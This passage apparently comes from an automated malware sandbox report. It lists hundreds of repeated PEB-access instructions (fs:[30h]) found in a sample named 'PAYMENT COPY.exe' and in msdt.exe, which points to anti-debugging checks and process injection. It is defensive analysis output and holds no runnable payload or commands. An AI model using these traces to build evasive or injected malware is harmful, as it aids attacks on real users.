          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00BA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D83D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CDE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CEFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04DA070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CFF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D0E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04CD4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CD40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04CD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 5_2_04D53884 mov eax, dword ptr fs:[00000030h]
